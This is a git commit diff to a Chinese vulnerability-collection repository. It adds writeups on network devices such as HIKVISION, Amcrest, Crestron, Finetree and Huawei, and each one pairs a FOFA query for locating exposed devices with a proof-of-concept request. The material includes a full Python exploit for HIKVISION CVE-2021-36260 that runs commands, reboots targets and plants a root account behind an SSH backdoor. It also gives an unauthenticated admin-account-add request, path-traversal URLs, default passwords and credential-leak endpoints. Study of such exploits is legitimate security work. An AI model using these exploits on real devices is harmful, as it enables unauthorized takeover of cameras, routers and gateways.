更新漏洞库：网络设备漏洞/

2025-11-05 10:50:23 +00:00 · 2022-05-19 18:49:40 +08:00 · 2022-05-19 18:49:40 +08:00 · 7d37b2dd89
commit 7d37b2dd89
parent a8aa838501
30 changed files with 2023 additions and 1 deletions
--- a/README.md
+++ b/README.md
@ -2,7 +2,11 @@

 ##### 【免责声明】本仓库所涉及的技术、思路和工具仅供学习，任何人不得将其用于非法用途和盈利，否则后果自行承担。

-## 项目导航
+《中华人民共和国网络安全法》第二十七条规定：
+
+- 任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得危害网络安全，不得利用网络从事危害国家安全、荣誉和利益，煽动颠覆国家政权、推翻社会主义制度，煽动分裂国家、破坏国家统一，宣扬恐怖主义、极端主义，宣扬民族仇恨、民族歧视，传播暴力、淫秽色情信息，编造、传播虚假信息扰乱经济秩序和社会秩序，以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。
+
+## 0x01 项目导航

 - CMS漏洞

@ -292,12 +296,14 @@
 - 网络设备漏洞

  * ACTI 视频监控 images 任意文件读取漏洞
+  * Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞 CVE-2017-8229
  * Arcadyan固件 cgi_i_filter.js 配置信息泄漏漏洞 CVE-2021-20092
  * Arcadyan固件 image 路径遍历漏洞 CVE-2021-20090
  * Cisco ASA设备 任意文件读取漏洞 CVE-2020-3452
  * Cisco ASA设备任意文件删除漏洞 CVE-2020-3187
  * Cisco HyperFlex HX storfs-asup 远程命令执行漏洞 CVE-2021-1497
  * Cisco HyperFlex HX upload 任意文件上传漏洞 CVE-2021-1499
+  * Crestron aj.html 账号密码泄漏漏洞 CVE-2022-23178
  * D-Link AC管理系统 默认账号密码
  * D-Link DAR-8000 importhtml.php 远程命令执行漏洞
  * D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078
@ -311,17 +317,31 @@
  * DD-WRT UPNP缓冲区溢出漏洞 CVE-2021-27137
  * DrayTek企业网络设备 远程命令执行 CVE-2020-8515
  * DVR 登录绕过漏洞 CVE-2018-9995
+  * Finetree 5MP 摄像机 user_pop.php 任意用户添加漏洞 CNVD-2021-42372
  * FLIR-AX8 download.php 任意文件下载
  * H3C SecPath下一代防火墙 任意文件下载漏洞
+  * HIKVISION DSIDSIPC 等设备 远程命令执行漏洞 CVE-2021-36260
+  * HIKVISION 流媒体管理服务器 user.xml 账号密码泄漏漏洞
+  * HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544
+  * HIKVISION 视频编码设备接入网关 $DATA 任意文件读取
+  * HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞
+  * HIKVISION 联网网关 downdb.php 任意文件读取漏洞
+  * Huawei DG8045 deviceinfo 信息泄漏漏洞
  * Huawei HG659 lib 任意文件读取漏洞
  * iKuai 流控路由 SQL注入漏洞
  * Intelbras Wireless 未授权与密码泄露 CVE-2021-3017
  * JCG JHR-N835R 后台命令执行漏洞
  * KEDACOM数字系统接入网关 任意文件读取漏洞
+  * KONE 通力电梯管理系统 app_show_log_lines.php 任意文件读取漏洞
  * Kyan 网络监控设备 hosts 账号密码泄露漏洞
+  * Kyan 网络监控设备 license.php 远程命令执行漏洞
+  * Kyan 网络监控设备 module.php 远程命令执行漏洞
  * Kyan 网络监控设备 run.php 远程命令执行漏洞
+  * Kyan 网络监控设备 time.php 远程命令执行漏洞
  * MagicFlow 防火墙网关 main.xp 任意文件读取漏洞
  * MSA 互联网管理网关 msa 任意文件下载漏洞
+  * NetMizer 日志管理系统 cmd.php 远程命令执行漏洞
+  * NetMizer 日志管理系统 data 目录遍历漏洞
  * NetMizer 日志管理系统 登录绕过漏洞
  * rConfig ajaxArchiveFiles.php 后台远程命令执行漏洞
  * rConfig ajaxEditTemplate.php 后台远程命令执行漏洞
@ -331,6 +351,9 @@
  * Selea OCR-ANPR摄像机 get_file.php 任意文件读取漏洞
  * Selea OCR-ANPR摄像机 SeleaCamera 任意文件读取漏洞
  * SonicWall SSL-VPN 远程命令执行漏洞
+  * Tenda 11N无线路由器 Cookie 越权访问漏洞
+  * Tenda W15E企业级路由器 RouterCfm.cfg 配置文件泄漏漏洞
+  * TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084
  * TP-Link SR20 远程命令执行
  * TVT数码科技 NVMS-1000 路径遍历漏洞
  * Wayos AC集中管理系统默认弱口令 CNVD-2021-00876
@ -346,10 +369,16 @@
  * 中科网威 下一代防火墙控制系统 download.php 任意文件读取漏洞
  * 中科网威 下一代防火墙控制系统 账号密码泄露漏洞
  * 佑友防火墙 后台命令执行漏洞
+  * 华夏创新 LotWan广域网优化系统 check_instance_state.php 远程命令执行漏洞
+  * 华夏创新 LotWan广域网优化系统 static_arp_del.php SQL注入漏洞
+  * 华夏创新 LotWan广域网优化系统 static_arp.php 远程命令执行漏洞
  * 博华网龙防火墙 cmd.php 远程命令执行漏洞
  * 博华网龙防火墙 users.xml 未授权访问
  * 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞
  * 启明星辰 天清汉马USG防火墙 默认口令漏洞
+  * 大华 城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞
+  * 奇安信 网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞
+  * 奇安信 网康 下一代防火墙 router 远程命令执行漏洞
  * 宏电 H8922 Telnet后门漏洞 CVE-2021-28149
  * 宏电 H8922 后台任意文件读取漏洞 CVE-2021-28152
  * 宏电 H8922 后台命令执行漏洞 CVE-2021-28150
@ -357,10 +386,12 @@
  * 悦泰节能 智能数据网关 resources 任意文件读取漏洞
  * 惠尔顿 e地通 config.xml 信息泄漏漏洞
  * 朗视 TG400 GSM 网关目录遍历 CVE-2021-27328
+  * 浙江宇视科技 网络视频录像机 ISC LogReport.php 远程命令执行漏洞
  * 烽火 HG6245D info.asp 信息泄露漏洞
  * 电信 中兴ZXHN F450A网关 默认管理员账号密码漏洞
  * 电信 天翼网关F460 web_shell_cmd.gch 远程命令执行漏洞
  * 电信 网关配置管理系统 login.php SQL注入漏洞
+  * 百卓 Patflow showuser.php 后台SQL注入漏洞
  * 百卓 Smart importhtml.php 远程命令执行漏洞
  * 皓峰防火墙 setdomain.php 越权访问漏洞
  * 磊科 NI360路由器 认证绕过漏洞
@ -369,6 +400,8 @@
  * 网御 Leadsec ACM管理平台 importhtml.php 远程命令执行漏洞
  * 网神 下一代极速防火墙 pki_file_download 任意文件读取漏洞
  * 蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313
+  * 西迪特 Wi-Fi Web管理 Cookie 越权访问漏洞
+  * 西迪特 Wi-Fi Web管理 jumpto.php 后台命令执行漏洞
  * 迈普 ISG1000安全网关 任意文件下载漏洞
  * 锐捷 EG易网关 branch_passw.php 远程命令执行
  * 锐捷 EG易网关 cli.php 远程命令执行漏洞
@ -384,3 +417,10 @@
  * 锐捷 云课堂主机 pool 目录遍历漏洞
  * 飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞
  * 飞鱼星 家用智能路由 cookie.cgi 权限绕过
+
+## 0x02 声明
+
+本项目收集漏洞均源于互联网：
+
+- Vulhub：https://github.com/vulhub/vulhub
+- Peiqi：https://github.com/PeiQi0/PeiQi-WIKI-Book
--- a/网络设备漏洞/Amcrest
+++ b/网络设备漏洞/Amcrest
@ -0,0 +1,31 @@
+# Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞 CVE-2017-8229
+
+## 漏洞描述
+
+Amcrest IP Camera Web是Amcrest公司的一款无线IP摄像头，设备允许未经身份验证的攻击者下载管理凭据。
+
+## 漏洞影响
+
+```
+Amcrest Technologies. Amcrest IP Camera Web all
+```
+
+## FOFA
+
+```
+"Amcrest"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519161504045](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191616449.png)
+
+POC
+
+```
+/current_config/Sha1Account1
+```
+
+![image-20220519161546887](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191616340.png)
--- a/网络设备漏洞/Crestron
+++ b/网络设备漏洞/Crestron
@ -0,0 +1,27 @@
+# Crestron aj.html 账号密码泄漏漏洞 CVE-2022-23178
+
+## 漏洞描述
+
+Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息
+
+## 漏洞影响
+
+```
+Crestron HD等系列设备
+```
+
+## FOFA
+
+```
+app="Crestron-HD-RX-201-C-E"
+```
+
+## 漏洞复现
+
+POC
+
+```
+/aj.html?a=devi
+```
+
+![image-20220519161948146](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191619189.png)
--- a/网络设备漏洞/Finetree
+++ b/网络设备漏洞/Finetree
@ -0,0 +1,54 @@
+# Finetree 5MP 摄像机 user_pop.php 任意用户添加漏洞 CNVD-2021-42372
+
+## 漏洞描述
+
+Finetree 5MP 摄像机 user_pop.php文件存在未授权任意用户添加，攻击者添加后可以获取后台权限
+
+## 漏洞影响
+
+```
+Finetree 5MP
+Finetree 3MP
+```
+
+## FOFA
+
+```
+app="Finetree-5MP-Network-Camera"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519162837184](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191628247.png)
+
+存在漏洞的文件 user_pop.php
+
+![image-20220519163003628](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191630679.png)
+
+```
+POST /quicksetup/user_update.php HTTP/1.1
+Host: 
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
+Content-Length: 58
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=fn4qnpv5c8a2jgvf53vs1gufm6
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
+
+method=add&user=admin1234&pwd=admin1234&group=2&ptz_enable=0
+```
+
+可以Burpsuite发送POST请求
+
+![image-20220519163205310](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191632366.png)
+
+或者HackBar发送POST请求，返回200即为添加成功，返回804则为用户重复
+
+![image-20220519163124031](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191631102.png)
+
+利用添加的账户可以登录后台
+
+![image-20220519163442946](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191634048.png)
--- a/网络设备漏洞/HIKVISION
+++ b/网络设备漏洞/HIKVISION
@ -0,0 +1,402 @@
+# HIKVISION DS/IDS/IPC 等设备 远程命令执行漏洞 CVE-2021-36260
+
+## 漏洞描述
+
+海康威视部分产品中的web模块存在一个命令注入漏洞，由于对输入参数校验不充分，攻击者可以发送带有恶意命令的报文到受影响设备，成功利用此漏洞可以导致命令执行。海康威视已发布版本修复该漏洞
+
+## 漏洞影响
+
+1. 易受攻击的网络摄像机固件
+
+| **产品类型** | **影响版本**                        |
+| ------------ | ----------------------------------- |
+| IPC_E0       | IPC_E0_CN_STD_5.4.6_180112          |
+| IPC_E1       | 未知                                |
+| IPC_E2       | IPC_E2_EN_STD_5.5.52_180620         |
+| IPC_E4       | 未知                                |
+| IPC_E6       | IPCK_E6_EN_STD_5.5.100_200226       |
+| IPC_E7       | IPCK_E7_EN_STD_5.5.120_200604       |
+| IPC_G3       | IPC_G3_EN_STD_5.5.160_210416        |
+| IPC_G5       | IPC_G5_EN_STD_5.5.113_210317        |
+| IPC_H1       | IPC_H1_EN_STD_5.4.61_181204         |
+| IPC_H5       | IPCP_H5_EN_STD_5.5.85_201120        |
+| IPC_H8       | Factory installed firmware mid 2021 |
+| IPC_R2       | IPC_R2_EN_STD_V5.4.81_180203        |
+
+2. 易受攻击的 PTZ 摄像机固件
+
+| **产品类型** | **影响版本**                  |
+| ------------ | ----------------------------- |
+| IPD_E7       | IPDEX_E7_EN_STD_5.6.30_210526 |
+| IPD_G3       | IPDES_G3_EN_STD_5.5.42_210106 |
+| IPD_H5       | IPD_H5_EN_STD_5.5.41_200911   |
+| IPD_H7       | IPD_H7_EN_STD_5.5.40_200721   |
+| IPD_H8       | IPD_H8_EN_STD_5.7.1_210619    |
+
+3. 易受攻击的旧固件
+
+| **产品类型** | **影响版本** |
+| ------------ | ------------ |
+| IPC_R7       | 5.4.x        |
+| IPD_R7       | 5.4.x        |
+| IPC_G0       | 5.4.x        |
+| IPC_H3       | 5.4.x        |
+| IPD_H3       | 5.4.x        |
+
+4. OEM 固件
+
+## FOFA
+
+```
+"671-1e0-587ec4a1"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519171309273](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191713359.png)
+
+基于POC执行以下命令
+
+```
+python CVE-2021-36260.py --rhost 127.0.0.1 --rport 8081 --cmd "ls"
+```
+
+![image-20220519172448253](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191724307.png)
+
+## 漏洞POC
+
+```python
+# Exploit Title: Hikvision Web Server Build 210702 - Command Injection
+# Exploit Author: bashis
+# Vendor Homepage: https://www.hikvision.com/
+# Version: 1.0
+# CVE: CVE-2021-36260
+# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
+
+# All credit to Watchful_IP
+
+#!/usr/bin/env python3
+
+"""
+Note:
+1)  This code will _not_ verify if remote is Hikvision device or not.
+2)  Most of my interest in this code has been concentrated on how to
+    reliably detect vulnerable and/or exploitable devices.
+    Some devices are easy to detect, verify and exploit the vulnerability,
+    other devices may be vulnerable but not so easy to verify and exploit.
+    I think the combined verification code should have very high accuracy.
+3)  'safe check' (--check) will try write and read for verification
+    'unsafe check' (--reboot) will try reboot the device for verification
+
+[Examples]
+Safe vulnerability/verify check:
+    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
+
+Safe and unsafe vulnerability/verify check:
+(will only use 'unsafe check' if not verified with 'safe check')
+    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
+
+Unsafe vulnerability/verify check:
+    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
+
+Launch and connect to SSH shell:
+    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
+
+Execute command:
+    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
+
+Execute blind command:
+    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"
+
+$./CVE-2021-36260.py -h
+[*] Hikvision CVE-2021-36260
+[*] PoC by bashis <mcw noemail eu> (2021)
+usage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check]
+                         [--reboot] [--shell] [--cmd CMD]
+                         [--cmd_blind CMD_BLIND] [--noverify]
+                         [--proto {http,https}]
+
+optional arguments:
+  -h, --help            show this help message and exit
+  --rhost RHOST         Remote Target Address (IP/FQDN)
+  --rport RPORT         Remote Target Port
+  --check               Check if vulnerable
+  --reboot              Reboot if vulnerable
+  --shell               Launch SSH shell
+  --cmd CMD             execute cmd (i.e: "ls -l")
+  --cmd_blind CMD_BLIND
+                        execute blind cmd (i.e: "reboot")
+  --noverify            Do not verify if vulnerable
+  --proto {http,https}  Protocol used
+$
+"""
+
+import os
+import argparse
+import time
+
+import requests
+from requests import packages
+from requests.packages import urllib3
+from requests.packages.urllib3 import exceptions
+
+
+class Http(object):
+    def __init__(self, rhost, rport, proto, timeout=60):
+        super(Http, self).__init__()
+
+        self.rhost = rhost
+        self.rport = rport
+        self.proto = proto
+        self.timeout = timeout
+
+        self.remote = None
+        self.uri = None
+
+        """ Most devices will use self-signed certificates, suppress any warnings """
+        requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+        self.remote = requests.Session()
+
+        self._init_uri()
+
+        self.remote.headers.update({
+            'Host': f'{self.rhost}:{self.rport}',
+            'Accept': '*/*',
+            'X-Requested-With': 'XMLHttpRequest',
+            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
+            'Accept-Encoding': 'gzip, deflate',
+            'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8',
+        })
+        """
+        self.remote.proxies.update({
+            # 'http': 'http://127.0.0.1:8080',
+        })
+        """
+
+    def send(self, url=None, query_args=None, timeout=5):
+
+        if query_args:
+            """Some devices can handle more, others less, 22 bytes seems like a good compromise"""
+            if len(query_args) > 22:
+                print(f'[!] Error: Command "{query_args}" to long ({len(query_args)})')
+                return None
+
+        """This weird code will try automatically switch between http/https
+        and update Host
+        """
+        try:
+            if url and not query_args:
+                return self.get(url, timeout)
+            else:
+                data = self.put('/SDK/webLanguage', query_args, timeout)
+        except requests.exceptions.ConnectionError:
+            self.proto = 'https' if self.proto == 'http' else 'https'
+            self._init_uri()
+            try:
+                if url and not query_args:
+                    return self.get(url, timeout)
+                else:
+                    data = self.put('/SDK/webLanguage', query_args, timeout)
+            except requests.exceptions.ConnectionError:
+                return None
+        except requests.exceptions.RequestException:
+            return None
+        except KeyboardInterrupt:
+            return None
+
+        """302 when requesting http on https enabled device"""
+
+        if data.status_code == 302:
+            redirect = data.headers.get('Location')
+            self.uri = redirect[:redirect.rfind('/')]
+            self._update_host()
+            if url and not query_args:
+                return self.get(url, timeout)
+            else:
+                data = self.put('/SDK/webLanguage', query_args, timeout)
+
+        return data
+
+    def _update_host(self):
+        if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]:
+            self.remote.headers.update({
+                'Host': self.uri[self.uri.rfind('://') + 3:],
+            })
+
+    def _init_uri(self):
+        self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport))
+
+    def put(self, url, query_args, timeout):
+        """Command injection in the <language> tag"""
+        query_args = '<?xml version="1.0" encoding="UTF-8"?>' \
+                     f'<language>$({query_args})</language>'
+        return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout)
+
+    def get(self, url, timeout):
+        return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout)
+
+
+def check(remote, args):
+    """
+    status_code == 200 (OK);
+        Verified vulnerable and exploitable
+    status_code == 500 (Internal Server Error);
+        Device may be vulnerable, but most likely not
+        The SDK webLanguage tag is there, but generate status_code 500 when language not found
+        I.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500)
+        (Issue: Could also be other directory than 'webLib', r/o FS etc...)
+    status_code == 401 (Unauthorized);
+        Defiantly not vulnerable
+    """
+    if args.noverify:
+        print(f'[*] Not verifying remote "{args.rhost}:{args.rport}"')
+        return True
+
+    print(f'[*] Checking remote "{args.rhost}:{args.rport}"')
+
+    data = remote.send(url='/', query_args=None)
+    if data is None:
+        print(f'[-] Cannot establish connection to "{args.rhost}:{args.rport}"')
+        return None
+    print('[i] ETag:', data.headers.get('ETag'))
+
+    data = remote.send(query_args='>webLib/c')
+    if data is None or data.status_code == 404:
+        print(f'[-] "{args.rhost}:{args.rport}" do not looks like Hikvision')
+        return False
+    status_code = data.status_code
+
+    data = remote.send(url='/c', query_args=None)
+    if not data.status_code == 200:
+        """We could not verify command injection"""
+        if status_code == 500:
+            print(f'[-] Could not verify if vulnerable (Code: {status_code})')
+            if args.reboot:
+                return check_reboot(remote, args)
+        else:
+            print(f'[+] Remote is not vulnerable (Code: {status_code})')
+        return False
+
+    print('[!] Remote is verified exploitable')
+    return True
+
+
+def check_reboot(remote, args):
+    """
+    We sending 'reboot', wait 2 sec, then checking with GET request.
+    - if there is data returned, we can assume remote is not vulnerable.
+    - If there is no connection or data returned, we can assume remote is vulnerable.
+    """
+    if args.check:
+        print('[i] Checking if vulnerable with "reboot"')
+    else:
+        print(f'[*] Checking remote "{args.rhost}:{args.rport}" with "reboot"')
+    remote.send(query_args='reboot')
+    time.sleep(2)
+    if not remote.send(url='/', query_args=None):
+        print('[!] Remote is vulnerable')
+        return True
+    else:
+        print('[+] Remote is not vulnerable')
+        return False
+
+
+def cmd(remote, args):
+    if not check(remote, args):
+        return False
+    data = remote.send(query_args=f'{args.cmd}>webLib/x')
+    if data is None:
+        return False
+
+    data = remote.send(url='/x', query_args=None)
+    if data is None or not data.status_code == 200:
+        print(f'[!] Error execute cmd "{args.cmd}"')
+        return False
+    print(data.text)
+    return True
+
+
+def cmd_blind(remote, args):
+    """
+    Blind command injection
+    """
+    if not check(remote, args):
+        return False
+    data = remote.send(query_args=f'{args.cmd_blind}')
+    if data is None or not data.status_code == 500:
+        print(f'[-] Error execute cmd "{args.cmd_blind}"')
+        return False
+    print(f'[i] Try execute blind cmd "{args.cmd_blind}"')
+    return True
+
+
+def shell(remote, args):
+    if not check(remote, args):
+        return False
+    data = remote.send(url='/N', query_args=None)
+
+    if data.status_code == 404:
+        print(f'[i] Remote "{args.rhost}" not pwned, pwning now!')
+        data = remote.send(query_args='echo -n P::0:0:W>N')
+        if data.status_code == 401:
+            print(data.headers)
+            print(data.text)
+            return False
+        remote.send(query_args='echo :/:/bin/sh>>N')
+        remote.send(query_args='cat N>>/etc/passwd')
+        remote.send(query_args='dropbear -R -B -p 1337')
+        remote.send(query_args='cat N>webLib/N')
+    else:
+        print(f'[i] Remote "{args.rhost}" already pwned')
+
+    print(f'[*] Trying SSH to {args.rhost} on port 1337')
+    os.system(f'stty echo; stty iexten; stty icanon; \
+    ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \
+    P@{args.rhost} -p 1337')
+
+
+def main():
+    print('[*] Hikvision CVE-2021-36260\n[*] PoC by bashis <mcw noemail eu> (2021)')
+
+    parser = argparse.ArgumentParser()
+    parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)')
+    parser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port')
+    parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable')
+    parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable')
+    parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell')
+    parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")')
+    parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: "reboot")')
+    parser.add_argument(
+        '--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable'
+    )
+    parser.add_argument(
+        '--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used'
+    )
+    args = parser.parse_args()
+
+    remote = Http(args.rhost, args.rport, args.proto)
+
+    try:
+        if args.shell:
+            shell(remote, args)
+        elif args.cmd:
+            cmd(remote, args)
+        elif args.cmd_blind:
+            cmd_blind(remote, args)
+        elif args.check:
+            check(remote, args)
+        elif args.reboot:
+            check_reboot(remote, args)
+        else:
+            parser.parse_args(['-h'])
+    except KeyboardInterrupt:
+        return False
+
+
+if __name__ == '__main__':
+    main()
+```
+
--- a/网络设备漏洞/HIKVISION
+++ b/网络设备漏洞/HIKVISION
@ -0,0 +1,42 @@
+# HIKVISION 流媒体管理服务器 user.xml 账号密码泄漏漏洞
+
+## 漏洞描述
+
+HIKVISION 流媒体管理服务器配置文件未做鉴权，攻击者通过漏洞可以获取网站账号密码
+
+## 漏洞影响
+
+```
+HIKVISION 流媒体管理服务器
+```
+
+## FOFA
+
+```
+"杭州海康威视系统技术有限公司 版权所有" && title="流媒体管理服务器"
+```
+
+## 漏洞复现
+
+登陆页面
+
+![image-20220519172629739](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191726829.png)
+
+POC
+
+```
+/config/user.xml
+```
+
+![image-20220519172714407](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191727443.png)
+
+```
+<user name="YWRtaW4=" password="MTIzNDU="/>
+```
+
+base64解密
+
+```
+<user name="admin" password="MTIzNDU="/>
+```
+
--- a/网络设备漏洞/HIKVISION
+++ b/网络设备漏洞/HIKVISION
@ -0,0 +1,30 @@
+# HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544
+
+## 漏洞描述
+
+杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞，攻击者可利用该漏洞登录后台通过文件遍历漏洞获取敏感信息
+
+## 漏洞影响
+
+```
+HIKVISION 流媒体管理服务器
+```
+
+## FOFA
+
+```
+"杭州海康威视系统技术有限公司 版权所有" && title="流媒体管理服务器"
+```
+
+## 漏洞复现
+
+登录页面如下， 默认账号密码为 `admin/12345`
+
+![image-20220519172955875](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191729966.png)
+
+访问如下URL下载`C:/windows/system.ini`文件
+
+```
+http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini
+```
+
--- a/网络设备漏洞/HIKVISION
+++ b/网络设备漏洞/HIKVISION
@ -0,0 +1,57 @@
+# HIKVISION 联网网关 downdb.php 任意文件读取漏洞
+
+## 漏洞描述
+
+海康威视 联网网关 在页面 downdb.php 的参数fileName存在任意文件下载漏洞
+
+## 漏洞影响
+
+```
+HIKVISION 联网网关，流媒体管理服务器
+```
+
+## FOFA
+
+```
+"杭州海康威视系统技术有限公司 版权所有" && title=="联网网关"
+```
+
+## 漏洞复现
+
+默认密码：`admin/12345`
+
+![image-20220519174002167](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191740359.png)
+
+出现漏洞的代码文件为downdb.php，可以未授权下载任意文件：
+
+```
+<?php
+$file_name=$_GET['fileName'];
+$file_dir = "../../../";
+if   (!file_exists($file_dir.$file_name))   {   //检查文件是否存在  
+  echo'<script> alert("文件不存在!");window.history.back(-1);</script>'; 
+  exit();
+
+}else{	
+	$file = fopen($file_dir . $file_name,"r"); // 打开文件
+	// 输入文件标签
+	Header("Content-type: application/octet-stream");
+	Header("Accept-Ranges: bytes");
+	Header("Accept-Length: ".filesize($file_dir . $file_name));
+	Header("Content-Disposition: attachment; filename=" . $file_name);
+	// 输出文件内容
+	echo fread($file,filesize($file_dir.$file_name));
+	fclose($file);
+	exit();
+}
+?> 
+```
+
+POC：
+
+```
+/localDomain/downdb.php?fileName=web/html/data/login.php
+/localDomain/downdb.php?fileName=web/html/localDomain/downdb.php
+```
+
+![image-20220519174022222](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191740299.png)
--- a/网络设备漏洞/HIKVISION
+++ b/网络设备漏洞/HIKVISION
@ -0,0 +1,31 @@
+# HIKVISION 视频编码设备接入网关 $DATA 任意文件读取
+
+## 漏洞描述
+
+HIKVISION 视频编码设备接入网关存在配置错误特性，特殊后缀请求php文件可读取源码
+
+## 漏洞影响
+
+```
+HIKVISION 视频编码设备接入网关
+```
+
+## FOFA
+
+```
+title="视频编码设备接入网关"
+```
+
+## 漏洞复现
+
+登陆页面
+
+![image-20220519174129368](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191741462.png)
+
+POC
+
+```
+/data/login.php::$DATA
+```
+
+![image-20220519174235421](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191742487.png)
--- a/网络设备漏洞/HIKVISION
+++ b/网络设备漏洞/HIKVISION
@ -0,0 +1,46 @@
+# HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞
+
+## 漏洞描述
+
+海康威视视频接入网关系统在页面`/serverLog/showFile.php`的参数fileName存在任意文件下载漏洞
+
+## 漏洞影响
+
+```
+HIKVISION 视频编码设备接入网关
+```
+
+## 网络测绘
+
+```
+title="视频编码设备接入网关"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519174129368](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191743965.png)
+
+漏洞文件为 `showFile.php`, 其中 `参数 fileName` 没有过滤危险字符，导致可文件遍历下载
+
+```
+<?php
+					$file_name = $_GET['fileName'];
+					$file_path = '../../../log/'.$file_name;
+					$fp = fopen($file_path, "r");
+					while($line = fgets($fp)){
+						$line = nl2br(htmlentities($line, ENT_COMPAT, "utf-8"));
+						echo '<span style="font-size:16px">'.$line.'</span>';
+					}
+					fclose($fp);
+?>
+```
+
+POC
+
+```
+/serverLog/showFile.php?fileName=../web/html/main.php
+```
+
+![image-20220519174337483](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191743535.png)
--- a/网络设备漏洞/Huawei
+++ b/网络设备漏洞/Huawei
@ -0,0 +1,33 @@
+# Huawei DG8045 deviceinfo 信息泄漏漏洞
+
+## 漏洞描述
+
+Huawei DG8045 deviceinfo api接口存在信息泄漏漏洞，攻击者通过泄漏的信息可以获得账号密码登录后台
+
+## 漏洞影响
+
+```
+Huawei DG8045
+```
+
+## FOFA
+
+```
+app="DG8045-Home-Gateway-DG8045"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519181753641](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191817718.png)
+
+验证POC
+
+```
+/api/system/deviceinfo
+```
+
+![image-20220519181803482](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191818539.png)
+
+SerialNumber 后8位即为初始密码
--- a/任意文件读取漏洞.md
+++ b/任意文件读取漏洞.md
@ -0,0 +1,31 @@
+# KONE 通力电梯管理系统 app_show_log_lines.php 任意文件读取漏洞
+
+## 漏洞描述
+
+KONE 通力电梯 app_show_log_lines.php文件过滤不足导致任意文件读取漏洞
+
+## 漏洞影响
+
+```
+KONE 通力电梯管理系统
+```
+
+## FOFA
+
+```
+"KONE Configuration management"
+```
+
+## 漏洞复现
+
+主页面
+
+![image-20220519184439370](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191844461.png)
+
